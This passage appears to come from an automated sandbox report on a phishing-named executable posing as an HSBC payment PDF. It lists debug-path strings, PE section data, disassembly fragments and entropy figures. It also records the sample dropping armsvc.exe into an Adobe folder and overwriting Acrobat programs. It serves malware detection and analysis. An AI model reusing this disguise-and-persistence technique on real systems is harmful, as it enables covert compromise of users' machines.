                  Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000002.00000003.2494075294.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: private_browsing.pdbp source: private_browsing.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000002.00000003.2520750175.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000002.00000003.2783650894.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000002.00000003.2540240807.00000000019C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2532596834.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000002.00000003.2212157226.00000000021B0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: TieringEngineService.pdb source: armsvc.exe, 00000002.00000003.2181024271.0000000002200000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000002.00000003.2181024271.0000000002200000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdbr source: AdobeARMHelper.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000002.00000003.2455646174.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2090731702.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: minidump-analyzer.pdb source: minidump-analyzer.exe.2.dr
                  Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2111485745.0000000004140000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe_x64.pdb source: Aut2exe_x64.exe.2.dr
                  Source: Binary string: ALG.pdbGCTL source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2090731702.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2124835296.0000000004130000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2156732156.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000002.00000003.2296158721.00000000020F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wbengine.pdbGCTL source: wbengine.exe.2.dr
                  Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.2.dr
                  Source: Binary string: ssh-agent.pdbX source: armsvc.exe, 00000002.00000003.2175446283.0000000002200000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdb source: armsvc.exe, 00000002.00000003.2609607534.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000002.00000003.2158998087.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.2494075294.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000002.00000003.2455646174.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000002.00000003.2609607534.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: msiexec.exe.0.drStatic PE information: 0x88D88F1C [Thu Oct 2 20:16:28 2042 UTC]
                  Source: elevation_service.exe.0.drStatic PE information: section name: .00cfg
                  Source: elevation_service.exe.0.drStatic PE information: section name: .gxfg
                  Source: elevation_service.exe.0.drStatic PE information: section name: .retplne
                  Source: elevation_service.exe.0.drStatic PE information: section name: _RDATA
                  Source: elevation_service.exe.0.drStatic PE information: section name: malloc_h
                  Source: maintenanceservice.exe.0.drStatic PE information: section name: .00cfg
                  Source: maintenanceservice.exe.0.drStatic PE information: section name: .voltbl
                  Source: maintenanceservice.exe.0.drStatic PE information: section name: _RDATA
                  Source: msdtc.exe.0.drStatic PE information: section name: .didat
                  Source: msiexec.exe.0.drStatic PE information: section name: .didat
                  Source: MsSense.exe.0.drStatic PE information: section name: .didat
                  Source: armsvc.exe.0.drStatic PE information: section name: .didat
                  Source: alg.exe.0.drStatic PE information: section name: .didat
                  Source: FXSSVC.exe.0.drStatic PE information: section name: .didat
                  Source: elevation_service.exe0.0.drStatic PE information: section name: .00cfg
                  Source: elevation_service.exe0.0.drStatic PE information: section name: .gxfg
                  Source: elevation_service.exe0.0.drStatic PE information: section name: .retplne
                  Source: elevation_service.exe0.0.drStatic PE information: section name: _RDATA
                  Source: elevation_service.exe0.0.drStatic PE information: section name: malloc_h
                  Source: private_browsing.exe.2.drStatic PE information: section name: .00cfg
                  Source: private_browsing.exe.2.drStatic PE information: section name: .voltbl
                  Source: updater.exe.2.drStatic PE information: section name: .00cfg
                  Source: updater.exe.2.drStatic PE information: section name: .voltbl
                  Source: updater.exe.2.drStatic PE information: section name: _RDATA
                  Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: section name: .00cfg
                  Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: section name: .retplne
                  Source: Spectrum.exe.2.drStatic PE information: section name: .didat
                  Source: TieringEngineService.exe.2.drStatic PE information: section name: .didat
                  Source: vds.exe.2.drStatic PE information: section name: .didat
                  Source: VSSVC.exe.2.drStatic PE information: section name: .didat
                  Source: unpack200.exe.2.drStatic PE information: section name: .00cfg
                  Source: ie_to_edge_stub.exe.2.drStatic PE information: section name: .00cfg
                  Source: ie_to_edge_stub.exe.2.drStatic PE information: section name: .gxfg
                  Source: ie_to_edge_stub.exe.2.drStatic PE information: section name: .retplne
                  Source: ie_to_edge_stub.exe.2.drStatic PE information: section name: _RDATA
                  Source: cookie_exporter.exe.2.drStatic PE information: section name: .00cfg
                  Source: cookie_exporter.exe.2.drStatic PE information: section name: .gxfg
                  Source: cookie_exporter.exe.2.drStatic PE information: section name: .retplne
                  Source: cookie_exporter.exe.2.drStatic PE information: section name: _RDATA
                  Source: identity_helper.exe.2.drStatic PE information: section name: .00cfg
                  Source: identity_helper.exe.2.drStatic PE information: section name: .gxfg
                  Source: identity_helper.exe.2.drStatic PE information: section name: .retplne
                  Source: identity_helper.exe.2.drStatic PE information: section name: _RDATA
                  Source: identity_helper.exe.2.drStatic PE information: section name: malloc_h
                  Source: setup.exe.2.drStatic PE information: section name: .00cfg
                  Source: setup.exe.2.drStatic PE information: section name: .gxfg
                  Source: setup.exe.2.drStatic PE information: section name: .retplne
                  Source: setup.exe.2.drStatic PE information: section name: LZMADEC
                  Source: setup.exe.2.drStatic PE information: section name: _RDATA
                  Source: setup.exe.2.drStatic PE information: section name: malloc_h
                  Source: msedgewebview2.exe.2.drStatic PE information: section name: .00cfg
                  Source: msedgewebview2.exe.2.drStatic PE information: section name: .gxfg
                  Source: msedgewebview2.exe.2.drStatic PE information: section name: .retplne
                  Source: msedgewebview2.exe.2.drStatic PE information: section name: CPADinfo
                  Source: msedgewebview2.exe.2.drStatic PE information: section name: LZMADEC
                  Source: msedgewebview2.exe.2.drStatic PE information: section name: _RDATA
                  Source: msedgewebview2.exe.2.drStatic PE information: section name: malloc_h
                  Source: msedge_proxy.exe.2.drStatic PE information: section name: .00cfg
                  Source: msedge_proxy.exe.2.drStatic PE information: section name: .gxfg
                  Source: msedge_proxy.exe.2.drStatic PE information: section name: .retplne
                  Source: msedge_proxy.exe.2.drStatic PE information: section name: _RDATA
                  Source: msedge_proxy.exe.2.drStatic PE information: section name: malloc_h
                  Source: WmiApSrv.exe.2.drStatic PE information: section name: .didat
                  Source: wmpnetwk.exe.2.drStatic PE information: section name: .didat
                  Source: SearchIndexer.exe.2.drStatic PE information: section name: .didat
                  Source: Acrobat.exe.2.drStatic PE information: section name: .didat
                  Source: Acrobat.exe.2.drStatic PE information: section name: _RDATA
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: .00cfg
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: .gxfg
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: .retplne
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: LZMADEC
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: _RDATA
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: malloc_h
                  Source: notification_click_helper.exe.2.drStatic PE information: section name: .00cfg
                  Source: notification_click_helper.exe.2.drStatic PE information: section name: .gxfg
                  Source: notification_click_helper.exe.2.drStatic PE information: section name: .retplne
                  Source: notification_click_helper.exe.2.drStatic PE information: section name: CPADinfo
                  Source: notification_click_helper.exe.2.drStatic PE information: section name: _RDATA
                  Source: notification_click_helper.exe.2.drStatic PE information: section name: malloc_h
                  Source: pwahelper.exe.2.drStatic PE information: section name: .00cfg
                  Source: pwahelper.exe.2.drStatic PE information: section name: .gxfg
                  Source: pwahelper.exe.2.drStatic PE information: section name: .retplne
                  Source: pwahelper.exe.2.drStatic PE information: section name: _RDATA
                  Source: pwahelper.exe.2.drStatic PE information: section name: malloc_h
                  Source: msedge_proxy.exe0.2.drStatic PE information: section name: .00cfg
                  Source: msedge_proxy.exe0.2.drStatic PE information: section name: .gxfg
                  Source: msedge_proxy.exe0.2.drStatic PE information: section name: .retplne
                  Source: msedge_proxy.exe0.2.drStatic PE information: section name: _RDATA
                  Source: msedge_proxy.exe0.2.drStatic PE information: section name: malloc_h
                  Source: pwahelper.exe0.2.drStatic PE information: section name: .00cfg
                  Source: pwahelper.exe0.2.drStatic PE information: section name: .gxfg
                  Source: pwahelper.exe0.2.drStatic PE information: section name: .retplne
                  Source: pwahelper.exe0.2.drStatic PE information: section name: _RDATA
                  Source: pwahelper.exe0.2.drStatic PE information: section name: malloc_h
                  Source: MicrosoftEdgeUpdate.exe.2.drStatic PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateBroker.exe.2.drStatic PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.drStatic PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.drStatic PE information: section name: _RDATA
                  Source: MicrosoftEdgeUpdateCore.exe.2.drStatic PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateOnDemand.exe.2.drStatic PE information: section name: .didat
                  Source: AcroCEF.exe.2.drStatic PE information: section name: .didat
                  Source: AcroCEF.exe.2.drStatic PE information: section name: _RDATA
                  Source: SingleClientServicesUpdater.exe.2.drStatic PE information: section name: .didat
                  Source: SingleClientServicesUpdater.exe.2.drStatic PE information: section name: _RDATA
                  Source: AcroCEF.exe0.2.drStatic PE information: section name: .didat
                  Source: AcroCEF.exe0.2.drStatic PE information: section name: _RDATA
                  Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_007468CE push E9000001h; retn 0000h7_2_007468D3
                  Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_007452E3 push E9000001h; retf 0000h7_2_007452E8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 11_2_008968CE push E9000001h; retn 0000h11_2_008968D3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 11_2_008952E3 push E9000001h; retf 0000h11_2_008952E8
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_01A568CE push E9000001h; retn 0000h12_2_01A568D3
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_01A552E3 push E9000001h; retf 0000h12_2_01A552E8
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 14_2_00B768CE push E9000001h; retn 0000h14_2_00B768D3
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 14_2_00B752E3 push E9000001h; retf 0000h14_2_00B752E8
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C58F1 push 006C5856h; ret 15_2_006C5908
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7904h; ret 15_2_006E78F8
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E78C7h; ret 15_2_006E7940
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7DE8h; ret 15_2_006E79A8
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7B68h; ret 15_2_006E7BE4
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7C47h; ret 15_2_006E7BEC
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7FD6h; ret 15_2_006E7C15
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7D34h; ret 15_2_006E7C9B
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7E06h; ret 15_2_006E7D33
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E8004h; ret 15_2_006E7E25
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7C7Ch; ret 15_2_006E7E6E
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7FC8h; ret 15_2_006E7F80
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7D4Ah; ret 15_2_006E7FC6
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7986h; ret 15_2_006E8052
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E7EDBh; ret 15_2_006E8076
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006E7960 push 006E8077h; ret 15_2_006E80AC
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C8140 push 006C5D22h; ret 15_2_006C5CB0
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C8140 push 006C5C60h; ret 15_2_006C5D09
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C8140 push 006C5FAEh; ret 15_2_006C5F1A
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C8140 push 006C5EE7h; ret 15_2_006C5F39
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C8140 push 006C62B2h; ret 15_2_006C604C
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C8140 push 006C631Bh; ret 15_2_006C639A
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C8140 push 006C63FFh; ret 15_2_006C642E
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: section name: .reloc entropy: 7.92048352815656
                  Source: elevation_service.exe.0.drStatic PE information: section name: .reloc entropy: 7.933942775083277
                  Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.923551573945185
                  Source: FXSSVC.exe.0.drStatic PE information: section name: .reloc entropy: 7.930049273539673
                  Source: elevation_service.exe0.0.drStatic PE information: section name: .reloc entropy: 7.931710608490168
                  Source: SensorDataService.exe.0.drStatic PE information: section name: .reloc entropy: 7.922508358648496
                  Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: section name: .reloc entropy: 7.922137446772068
                  Source: Aut2exe.exe.2.drStatic PE information: section name: .rsrc entropy: 7.796131717000906
                  Source: Aut2exe_x64.exe.2.drStatic PE information: section name: .rsrc entropy: 7.796265449576229
                  Source: AutoIt3_x64.exe.2.drStatic PE information: section name: .reloc entropy: 7.931903463252608
                  Source: SciTE.exe.2.drStatic PE information: section name: .reloc entropy: 7.902670479835503
                  Source: Spectrum.exe.2.drStatic PE information: section name: .reloc entropy: 7.9333003267542574
                  Source: AgentService.exe.2.drStatic PE information: section name: .reloc entropy: 7.924377519176522
                  Source: vds.exe.2.drStatic PE information: section name: .reloc entropy: 7.9288065988421526
                  Source: VSSVC.exe.2.drStatic PE information: section name: .reloc entropy: 7.927165005781515
                  Source: wbengine.exe.2.drStatic PE information: section name: .reloc entropy: 7.929030644122834
                  Source: identity_helper.exe.2.drStatic PE information: section name: .reloc entropy: 7.9282492487747325
                  Source: setup.exe.2.drStatic PE information: section name: .reloc entropy: 7.932290448125885
                  Source: msedgewebview2.exe.2.drStatic PE information: section name: .reloc entropy: 7.9235591235991345
                  Source: msedge_proxy.exe.2.drStatic PE information: section name: .reloc entropy: 7.929869368256591
                  Source: wmpnetwk.exe.2.drStatic PE information: section name: .reloc entropy: 7.934824837152571
                  Source: SearchIndexer.exe.2.drStatic PE information: section name: .reloc entropy: 7.933777696033448
                  Source: 7zFM.exe.2.drStatic PE information: section name: .reloc entropy: 7.919208965965003
                  Source: 7zG.exe.2.drStatic PE information: section name: .reloc entropy: 7.914541466416614
                  Source: Acrobat.exe.2.drStatic PE information: section name: .reloc entropy: 7.927565188371514
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: .reloc entropy: 7.934263482132398
                  Source: notification_click_helper.exe.2.drStatic PE information: section name: .reloc entropy: 7.931785288914606
                  Source: pwahelper.exe.2.drStatic PE information: section name: .reloc entropy: 7.928414523184418
                  Source: msedge_proxy.exe0.2.drStatic PE information: section name: .reloc entropy: 7.929869279620502
                  Source: pwahelper.exe0.2.drStatic PE information: section name: .reloc entropy: 7.928410899512585
                  Source: AcroCEF.exe.2.drStatic PE information: section name: .reloc entropy: 7.92439021332001
                  Source: SingleClientServicesUpdater.exe.2.drStatic PE information: section name: .reloc entropy: 7.931683844459168
                  Source: AcroCEF.exe0.2.drStatic PE information: section name: .reloc entropy: 7.924401011555415

                  Persistence and Installation Behavior

                  barindex
                  Drops executable to a common third party application directory
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
